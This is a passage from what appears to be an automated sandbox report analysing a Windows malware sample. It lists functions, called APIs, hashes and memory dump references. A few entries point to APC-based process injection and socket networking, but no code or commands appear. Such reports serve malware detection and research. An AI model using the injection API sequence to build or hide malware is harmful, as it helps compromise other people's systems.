                • Instruction ID: 6d171a36c4c08b9b8eff4597b3c92a795ad68e5bf25a41179c96432e4c489423
                • Opcode Fuzzy Hash: 3dd1f773b3794dac3aa2364f63410e61f96c4d43ad1712998e2299525dae883a
                • Instruction Fuzzy Hash: C2212830608F044EE718EB6EE84137D77D0EB95221F55165FE016CF3D5D7E4584282AA
                Function 0388F740 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                • String ID:
                • API String ID: 3101085627-0
                • Opcode ID: 14ddf7d56459dce092d8b4c05f865c520464f36babfb135bd28acd5bcd2fd201
                • Instruction ID: 37d1666c1fce2b78e641ae25c275daf4989c17cfc39db7a147817c7cd2a7385c
                • Opcode Fuzzy Hash: 14ddf7d56459dce092d8b4c05f865c520464f36babfb135bd28acd5bcd2fd201
                • Instruction Fuzzy Hash: 9631A236700A458AFB11EFF9E48439D7375F788B88F554166EE09A7A28DF38C60AC340
                Function 034A4D97 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 034A4DC2
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A4DBA
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A4E06
                • _lseek_nolock.LIBCMT ref: 034A4E1F
                • _unlock_fhandle.LIBCMT ref: 034A4E40
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                • String ID:
                • API String ID: 1078912150-0
                • Opcode ID: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
                • Instruction ID: 79f9855e11eeffcddbe83f4e815553d8eecffeb0239bea1814a8fc8fe10abbae
                • Opcode Fuzzy Hash: a44390f2c37dd677b3233f6d87f92801b3f25a181347d6d3130cc20f15b56632
                • Instruction Fuzzy Hash: 6D21D731A09B004FE719FB6ED88173E7B94EB92231F16065FD0568F3A1D7E45C4283AA
                Function 038A4CDC Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 038A4D0E
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A4D05
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __doserrno.LIBCMT ref: 038A4D6B
                • _errno.LIBCMT ref: 038A4D72
                • _invalid_parameter_noinfo.LIBCMT ref: 038A4DD6
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                • Opcode ID: 9f8bd50f574e5b1fba15d47533313b02c9ba4f688673664e799b398f3f09af9d
                • Instruction ID: ebb5ef3bd62323e39652c7ddf31b017784ee3bb18ec6e25108178fb3bc6d293f
                • Opcode Fuzzy Hash: 9f8bd50f574e5b1fba15d47533313b02c9ba4f688673664e799b398f3f09af9d
                • Instruction Fuzzy Hash: 4D210775300B8446FB06EFFED85022E3A51A7807A0F5A4696DA25CB7D0CAB8C441C711
                Function 0389238C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 113sleeplibraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleA.KERNEL32 ref: 038923F6
                • GetProcAddress.KERNEL32 ref: 03892406
                  • Part of subcall function 038922A8: malloc.LIBCMT ref: 038922E6
                  • Part of subcall function 038922A8: WriteProcessMemory.KERNEL32 ref: 03892354
                  • Part of subcall function 038922A8: free.LIBCMT ref: 0389236A
                • Thread32Next.KERNEL32 ref: 038924A2
                • Sleep.KERNEL32 ref: 038924B8
                • ReadProcessMemory.KERNEL32 ref: 038924D9
                • WriteProcessMemory.KERNEL32 ref: 0389250C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: MemoryProcess$Write$AddressHandleModuleNextProcReadSleepThread32freemalloc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 2421628550-1374908105
                • Opcode ID: bfb52fbe3132d43843797ddb625b63e92ee4822df1cb6bb90e03f41037cd665a
                • Instruction ID: 2c05ed96d113dc1d012b54e99c9cae2983dc81191460118903989c3de93ae345
                • Opcode Fuzzy Hash: bfb52fbe3132d43843797ddb625b63e92ee4822df1cb6bb90e03f41037cd665a
                • Instruction Fuzzy Hash: 77416D72701B059AEF25CBA2E85039DB3B5F748B88F488566DE4D9BB18EF38C645C740
                Function 038ADC10 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 038ADC36
                • _errno.LIBCMT ref: 038ADC2B
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1812809483-0
                • Opcode ID: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
                • Instruction ID: fce5be3bb7fc0f278536a6ee471b2e270e70b4188d45a95236861a316ac19c79
                • Opcode Fuzzy Hash: 2db82fa7e3577a0467f99b3b756d91ff98ac30b20cd2bff14b3452a9952b3022
                • Instruction Fuzzy Hash: CC4145B6614BD5C7FF20EB9D85202A977A0E750BA8F9841A2DB94CBF84D778C045C700
                Function 0389E1BC Relevance: 13.6, APIs: 9, Instructions: 101COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 0389E1A4: _mtinitlocknum.LIBCMT ref: 038A1C5E
                  • Part of subcall function 0389E1A4: _amsg_exit.LIBCMT ref: 038A1C6A
                • DecodePointer.KERNEL32 ref: 0389E218
                • DecodePointer.KERNEL32 ref: 0389E236
                • EncodePointer.KERNEL32 ref: 0389E264
                • DecodePointer.KERNEL32 ref: 0389E279
                • EncodePointer.KERNEL32 ref: 0389E284
                • DecodePointer.KERNEL32 ref: 0389E296
                • DecodePointer.KERNEL32 ref: 0389E2A6
                • __crtCorExitProcess.LIBCMT ref: 0389E32A
                • ExitProcess.KERNEL32 ref: 0389E332
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                • String ID:
                • API String ID: 1550138920-0
                • Opcode ID: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
                • Instruction ID: 24f6125cf6b0d7d4fa011b319c6415238d160cf82fbe8bf1e7765e4cbafecd49
                • Opcode Fuzzy Hash: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
                • Instruction Fuzzy Hash: BB41B430216B4181FF55DF95F84431AA7A9B788BC4F4840AAF98E97B64DF38D555C300
                Function 0389604C Relevance: 13.6, APIs: 9, Instructions: 96threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentDuplicateHandleProcess$ErrorLast$AttributeProcThreadUpdate
                • String ID:
                • API String ID: 570851288-0
                • Opcode ID: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
                • Instruction ID: adc124ffde97fb2508de39dd893c19ee6ed7d70e0d609ef5f28a31fa48b820c9
                • Opcode Fuzzy Hash: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
                • Instruction Fuzzy Hash: BD416C72614B4187EB15DFA2E84435AB7A5F788BE8F0C41A9EE8987B55EF7CC205C700
                Function 03894B88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                • String ID:
                • API String ID: 3339321253-0
                • Opcode ID: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
                • Instruction ID: 3cb0a48504a21a123122eb319d094a30da3f159eddd4afbbc1e548bec916e64e
                • Opcode Fuzzy Hash: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
                • Instruction Fuzzy Hash: 7B314DA131478586EB25DF66E8443AFA365F744B9CF484165EE0A47B98DF3CC64AC700
                Function 034A373B Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 034A3766
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A375E
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A37AA
                • _unlock_fhandle.LIBCMT ref: 034A37E4
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                • String ID:
                • API String ID: 2464146582-0
                • Opcode ID: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
                • Instruction ID: c9508a3b64f9b422acfcf13d4aeda361df70d0de680405bee9a8e77382b337c6
                • Opcode Fuzzy Hash: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
                • Instruction Fuzzy Hash: 26213A78A0CB004FF718EF6DE84133D7AD0DB95232F15424FD0168F295E7A45C4287AA
                Function 03895220 Relevance: 13.6, APIs: 9, Instructions: 72COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 03895268: htonl.WS2_32 ref: 038952C5
                  • Part of subcall function 03895268: select.WS2_32 ref: 03895333
                  • Part of subcall function 03895268: __WSAFDIsSet.WS2_32 ref: 0389534B
                  • Part of subcall function 03895268: accept.WS2_32 ref: 03895368
                  • Part of subcall function 03895268: ioctlsocket.WS2_32 ref: 03895380
                  • Part of subcall function 03895268: __WSAFDIsSet.WS2_32 ref: 03895423
                • GetTickCount.KERNEL32 ref: 03895232
                  • Part of subcall function 038955B4: malloc.LIBCMT ref: 038955E6
                  • Part of subcall function 038955B4: htonl.WS2_32 ref: 03895619
                  • Part of subcall function 038955B4: recvfrom.WS2_32 ref: 0389565D
                  • Part of subcall function 038955B4: WSAGetLastError.WS2_32 ref: 0389566A
                • GetTickCount.KERNEL32 ref: 0389524A
                • GetTickCount.KERNEL32 ref: 03895768
                • GetTickCount.KERNEL32 ref: 0389577E
                • shutdown.WS2_32 ref: 0389579D
                • shutdown.WS2_32 ref: 038957B2
                • closesocket.WS2_32 ref: 038957BC
                • free.LIBCMT ref: 038957DC
                • free.LIBCMT ref: 038957F1
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                • String ID:
                • API String ID: 3610715900-0
                • Opcode ID: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
                • Instruction ID: be79057b9420319f282bf00756a9e22f731ca18da41939f3af1c055144ea4285
                • Opcode Fuzzy Hash: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
                • Instruction Fuzzy Hash: 52217E76600702D6FF22DFB5E84432DA368F78AF88F1C81A2DE598A214DF34C685C751
                Function 034A2F5F Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 034A2F80
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A2F78
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A2FC4
                • _close_nolock.LIBCMT ref: 034A2FD7
                • _unlock_fhandle.LIBCMT ref: 034A2FF0
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                • String ID:
                • API String ID: 2140805544-0
                • Opcode ID: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
                • Instruction ID: b99256bdf22f378ff6031c47794218817909fc9782e4d1abca20e4cb3f70b5b1
                • Opcode Fuzzy Hash: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
                • Instruction Fuzzy Hash: 49115636509F004EE729EF6EDC903297A90EB51321F160A6FE017CF2E5D6F48841A3A9
                Function 038A5AC8 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 038A5AF3
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A5AEB
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A5B37
                • _lseeki64_nolock.LIBCMT ref: 038A5B50
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                • String ID:
                • API String ID: 4140391395-0
                • Opcode ID: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
                • Instruction ID: 3fd63e9a67bcd600e9923a7fd8430097724dd952afed6fe90c400f2ea500efa2
                • Opcode Fuzzy Hash: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
                • Instruction Fuzzy Hash: ED11F372600B4445FA06EFADD81032D7A91A781BF3F0D5B959E79CB3D0CB7C84828726
                Function 038A5950 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 038A597B
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A5973
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A59BF
                • _lseek_nolock.LIBCMT ref: 038A59D8
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                • String ID:
                • API String ID: 310312816-0
                • Opcode ID: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
                • Instruction ID: 159f46d1b2721e86d20d8f1afdf31a913f940f25e388d167da58646becda43f6
                • Opcode Fuzzy Hash: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
                • Instruction Fuzzy Hash: CB112472710B8045FB06EFEDE89032D7A51BB817A2F1D4596EA56CF390CBBC8481C722
                Function 0349D2F3 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno
                • String ID:
                • API String ID: 2288870239-0
                • Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                • Instruction ID: 2f97f9cff8bba53cfdb7679f481c2c610c1b0b15a714157da057f0cbbf2db1ba
                • Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                • Instruction Fuzzy Hash: 31318D316A4E0A8FFFA4EB69E8D476976D1FB58326F58412F8009CB2A0DB6C8845C715
                Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON
                Download Yara Rule
                APIs
                Strings
                • Mingw-w64 runtime failure:, xrefs: 00401D88
                • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                • Address %p has no image-section, xrefs: 00401DC0
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                • API String ID: 1804819252-1534286854
                • Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                • Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
                • Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                • Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748
                Function 038A42F4 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 038A431F
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A4317
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A4363
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                • String ID:
                • API String ID: 2611593033-0
                • Opcode ID: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
                • Instruction ID: 1551d53aca6ddb8c698eed60754b3e8c3a3291abfa45a8a450206b6938274bad
                • Opcode Fuzzy Hash: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
                • Instruction Fuzzy Hash: 3A11E772710B8046FF06EFEEDC50B2D795167C0BA2F8949999B15CB390CBF88441C726
                Function 038A85FC Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                • String ID:
                • API String ID: 2289611984-0
                • Opcode ID: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
                • Instruction ID: 066319820162dfbfc0b44e4574c6344d21d05853fbc2b3608c36f7fbbfb79821
                • Opcode Fuzzy Hash: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
                • Instruction Fuzzy Hash: 8E11B471700F4945F606EFEDD89832EBE54A780765F0D45A9DB15CB390DFB8C4418725
                Function 038A3B18 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 038A3B39
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A3B31
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A3B7D
                • _close_nolock.LIBCMT ref: 038A3B90
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                • String ID:
                • API String ID: 4060740672-0
                • Opcode ID: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
                • Instruction ID: 6a5bc6991a318894a09ace495c8239e29d21766f56d31d4fdc7c257a73254f3a
